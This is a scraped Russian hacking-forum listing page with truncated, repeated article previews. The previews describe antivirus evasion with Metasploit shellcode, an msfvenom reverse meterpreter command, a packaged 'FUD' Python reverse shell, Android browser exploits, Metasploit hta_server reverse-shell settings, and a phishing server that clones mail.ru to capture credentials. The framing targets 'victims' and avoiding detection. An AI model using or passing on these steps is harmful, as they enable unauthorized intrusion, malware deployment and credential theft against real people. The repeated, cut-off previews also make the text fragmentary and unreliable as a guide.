Форум информационной безопасности - Codeby.net
Статья Обход антивируса с помощью ctypes (python)
Привет колеги.
Сегодня покажу очень простенький пример обхода антивируса с помощью библиотеки ctypes в языке программирования python.
Суть обхода в том эта библиотека дает нам возможность выполнять код C|C++ в питоновском скрипте.
И мы смело сможем запустить шеллкод метасплоита в оперативной памяти.
Вы уж простите много писать пока не буду,времени очень мало у меня,отпишу потом пояснения в коментариях если возникнут вопросы у кого то .))
Вообщем ближе к делу
И так проделываем следующие шаги:
1)Создаем шеллкод командой:
тут ничего пояснять думаю не нужно ,лишь обратить внимания стоит на параметр -b которым мы указываем которые плохие символы в шеллкоде нужно не...
Сегодня покажу очень простенький пример обхода антивируса с помощью библиотеки ctypes в языке программирования python.
Суть обхода в том эта библиотека дает нам возможность выполнять код C|C++ в питоновском скрипте.
И мы смело сможем запустить шеллкод метасплоита в оперативной памяти.
Вы уж простите много писать пока не буду,времени очень мало у меня,отпишу потом пояснения в коментариях если возникнут вопросы у кого то .))
Вообщем ближе к делу
И так проделываем следующие шаги:
1)Создаем шеллкод командой:
Код:
msfvenom -p windows/meterpreter/reverse_https lport=1337 lhost=192.168.137.137 -b \0x0a\0x0b\0xff -f c
тут ничего пояснять думаю не нужно ,лишь обратить внимания стоит на параметр -b которым мы указываем которые плохие символы в шеллкоде нужно не...
Статья Быстрый способ получить meterpreter
Привет колеги. )
Сегодня речь пойдет непосредственно о пост эксплуатации скомпрометированной системы
(когда у нас есть командная строка удаленной windows машины от windows 7) и нам нужно расширить функционал своих возможностей с помощью метерпретер сессии метаслоита.
Для этого нам отлично подойдет тулза от trustedsec ,которая носит названия Magic Unicorn.
Одна из ее возможностей - это создания команды для PowerShell ,что есть доверенным приложением Windows.
Вообщем ближе к делу.
Качаем:
Запускаем.Смотрим help.
Выполняем команду
Сегодня речь пойдет непосредственно о пост эксплуатации скомпрометированной системы
(когда у нас есть командная строка удаленной windows машины от windows 7) и нам нужно расширить функционал своих возможностей с помощью метерпретер сессии метаслоита.
Для этого нам отлично подойдет тулза от trustedsec ,которая носит названия Magic Unicorn.
Одна из ее возможностей - это создания команды для PowerShell ,что есть доверенным приложением Windows.
Вообщем ближе к делу.
Качаем:
Код:
git clone https://github.com/trustedsec/unicorn.git
Запускаем.Смотрим help.
Выполняем команду
Код:
python unicorn.py...PUPY Remote Administration Tool (RAT)
Сегодня посмотрим ,на мой взгляд , довольно таки не плохой мультиплатформенный RAT на питоне c очень большим функционалом.
Pupy может использовать различные протоколы шифрования для комуникации с жертвой (SSL,HTTP,RSA,obfs3,scramblesuit), мигрировать в процессы (reflective injection), подгружать удаленные python скрипты, python пакеты и python C-extensions из оперативной памяти.
Pupy может создавать payloads в различных форматах ,таких как PE executables, reflective DLLs, python files, powershell, apk, ...
После тестирования данного продукта мне он напомнил что то общее между meterpreter и модулями из PowerShell Empire Framework...
Pupy может использовать различные протоколы шифрования для комуникации с жертвой (SSL,HTTP,RSA,obfs3,scramblesuit), мигрировать в процессы (reflective injection), подгружать удаленные python скрипты, python пакеты и python C-extensions из оперативной памяти.
Pupy может создавать payloads в различных форматах ,таких как PE executables, reflective DLLs, python files, powershell, apk, ...
После тестирования данного продукта мне он напомнил что то общее между meterpreter и модулями из PowerShell Empire Framework...
Статья Обход антивируса (Reverse Python Shell) 100% FUD
Привет.С вами DarkNode )
Сегодня будем обходить антивирус через Python Reverse TCP Shell.
ТОЛЬКО ПОСЛЕ ПРОЧТЕНИЯ НЕ ВЗДУМАЙТЕ ***** СЛИВАТЬ БИНАРНИК НА ВТ (ВирусТотал)
Итак наткнулся на гитхабе на прикольную реалиазацию reverse_tcp_shell через планировщик задач с использованием XML темплейта)
Довольно таки прикольно имхо)
Состоит наш бэкдор опять же таки из двух частей:
Серверная часть:
для упаковки в бинарный файл...
Сегодня будем обходить антивирус через Python Reverse TCP Shell.
ТОЛЬКО ПОСЛЕ ПРОЧТЕНИЯ НЕ ВЗДУМАЙТЕ ***** СЛИВАТЬ БИНАРНИК НА ВТ (ВирусТотал)
Итак наткнулся на гитхабе на прикольную реалиазацию reverse_tcp_shell через планировщик задач с использованием XML темплейта)
Довольно таки прикольно имхо)
Состоит наш бэкдор опять же таки из двух частей:
Серверная часть:
- reverse_tcp.py - вредоносный питоновоский скрипт ,который запускается на стороне жертвы
- может быть упакован в "exe" файл используя pyinstaller
Код:
pyinstaller --noconsole --onefile --icon=iconfile.ico reverse_tcp.pyКак попасть в Darknet? Полное Руководство !
Век интернета настал дорогие друзья ибо без него порой никак. Все знаю и умеют пользоваться популярными сервисами так сказать белым и контролируемым правительством и поисковиками интернетом. Но что же происходит на другой стороне, то что остается без контроля и что является запретным? Как же туда попасть? И что же там можно найти?
Что такое Darknet
Именно это место - а точнее все что нельзя найти простыми способами использованием поисковиков и называется Deepweeb (Глубокая паутина или же просто и изящно Darknet). Найти в даркнете можно что угодно от книг к самым большим извращениям и даже к покупке наркотиков и заказу убийств, насилию, и настоящих мега хакеров.
Возникает вопрос, а...
Что такое Darknet
Именно это место - а точнее все что нельзя найти простыми способами использованием поисковиков и называется Deepweeb (Глубокая паутина или же просто и изящно Darknet). Найти в даркнете можно что угодно от книг к самым большим извращениям и даже к покупке наркотиков и заказу убийств, насилию, и настоящих мега хакеров.
Возникает вопрос, а...
Статья Android WebView Exploit или взлом андроида по ссылке
Итак всем привет.Пост для совсем новичков)) Бывалые наверняка его юзали, но тут на форуме описания этого эсплойта еще не видел)
Сегодня мы узнаем о еще одном очень легком способе взлома андроид устройств версии не больше (4.2.x)
Если устройства с андроидом выше версии то смотрите эту статью
И так если вы обнаружили в своем сегменте сети (на одном WiFi к примеру ) или заведомо известно что ваша жертва использует девайс на андроиде версии ниже чем 4.2.x то этот эксплоит вам подойдет.
И так все что нам понадобиться:
1) Запустить метасплоит
2) Выбираем наш эксплойт:
[IMG...
Сегодня мы узнаем о еще одном очень легком способе взлома андроид устройств версии не больше (4.2.x)
Если устройства с андроидом выше версии то смотрите эту статью
И так если вы обнаружили в своем сегменте сети (на одном WiFi к примеру ) или заведомо известно что ваша жертва использует девайс на андроиде версии ниже чем 4.2.x то этот эксплоит вам подойдет.
И так все что нам понадобиться:
1) Запустить метасплоит
2) Выбираем наш эксплойт:
Код:
use exploit/android/browser/webview_addjavascriptinterfaceСтатья Эксплойт Stagefright или еще один способ взлома телефона на базе андроид
Добрый вечер, я хочу поделиться с вами, как можно получить доступ к телефону на базе андройд используя вредоносную ссылку. Сразу оговорюсь , данный метод работает на старых версиях андройд. И так поехали...
Для этого мы будем использовать эксплойт Stagefright. Запускаем метасплойт командой msfconsole. Дальше все делаем согласно скринам, я думаю так будет более понятно.
Указываем IP атакующего компа,порт,и другие данные...кто не знает свой ip, это можно сделать командой:
После запуска эксплойта, сгенерируется ссылка и запуститься сервер.Ссылку забрасываем жертве.
Итогом всему у вас будет открытая сессия.
Всем спасибо за внимания, удачного пентеста.
Для этого мы будем использовать эксплойт Stagefright. Запускаем метасплойт командой msfconsole. Дальше все делаем согласно скринам, я думаю так будет более понятно.
Указываем IP атакующего компа,порт,и другие данные...кто не знает свой ip, это можно сделать командой:
Код:
ifconfigПосле запуска эксплойта, сгенерируется ссылка и запуститься сервер.Ссылку забрасываем жертве.
Итогом всему у вас будет открытая сессия.
Всем спасибо за внимания, удачного пентеста.
Статья Weeman: Phishing - web-сервер
Всем привет! Здесь я хочу показать, как легко поднять простой, но довольно эффективный web-server для фишинга.
Он будет захватывать все введенные жертвой учетные данные в формах и собственно, передавать их на терминал сервера.
Софт, который будет использоваться – это Weeman, http сервер для фишинга, написанный на Python. Итак, для того чтобы воспользоваться им, откроем терминал и введем следующую команду.
> git clonegithub.com/Hypsurus/weeman
Затем перейдем в папку, куда был скачан сервер, и выполним следующие команды:
> cd weeman/
> ls –a
> chmod a+x weeman.py
> ./weeman.py
> help (сразу посмотрим доступные опции)
> show (посмотрим текущие настройки)
Используем weeman на примере mail.ru.
> set url hppts://mail.ru
> set port 8080
> set action_url...
Он будет захватывать все введенные жертвой учетные данные в формах и собственно, передавать их на терминал сервера.
Софт, который будет использоваться – это Weeman, http сервер для фишинга, написанный на Python. Итак, для того чтобы воспользоваться им, откроем терминал и введем следующую команду.
> git clone
Затем перейдем в папку, куда был скачан сервер, и выполним следующие команды:
> cd weeman/
> ls –a
> chmod a+x weeman.py
> ./weeman.py
> help (сразу посмотрим доступные опции)
> show (посмотрим текущие настройки)
Используем weeman на примере mail.ru.
> set url hppts://mail.ru
> set port 8080
> set action_url...
Статья Взлом удаленного ПК: HTA-server
Всем привет! В этой статье я хочу показать взлом удаленного компьютера, а точнее, получение сессии meterpreter c помощью эксплойта - hta_server.
Появился он недавно в версии Metasploit Framework v4.12.34,
так, что прежде чем начать убеждаемся в ее наличии, если отсутствует, обновляемся:
> apt-get update && apt-get upgrade –y && apt-get dist-upgrade
Запускаем Metasploit Framework:
> msfconsole
В появившейся консоли фреймворка пишем:
Теперь, если все проделано, верно, видим экран с таким содержимым:
Теперь немного теории, первая строка обозначает, что обратное подключение (от жертвы) ожидается на адресе 172.16.0.160 и порту 4444.
Вторая, это ссылка которую необходимо доставить нашей цели, но не просто...
Появился он недавно в версии Metasploit Framework v4.12.34,
так, что прежде чем начать убеждаемся в ее наличии, если отсутствует, обновляемся:
> apt-get update && apt-get upgrade –y && apt-get dist-upgrade
Запускаем Metasploit Framework:
> msfconsole
В появившейся консоли фреймворка пишем:
Код:
use exploit/windows/misc/hta_server
set payload /windows/meterpreter/reverse_tcp
set LHOST 172.16.0.160
set SRVHOST 172.16.0.160
set LPORT 4444
exploitТеперь немного теории, первая строка обозначает, что обратное подключение (от жертвы) ожидается на адресе 172.16.0.160 и порту 4444.
Вторая, это ссылка которую необходимо доставить нашей цели, но не просто...
Hacker Lab
Категории
Наши курсы
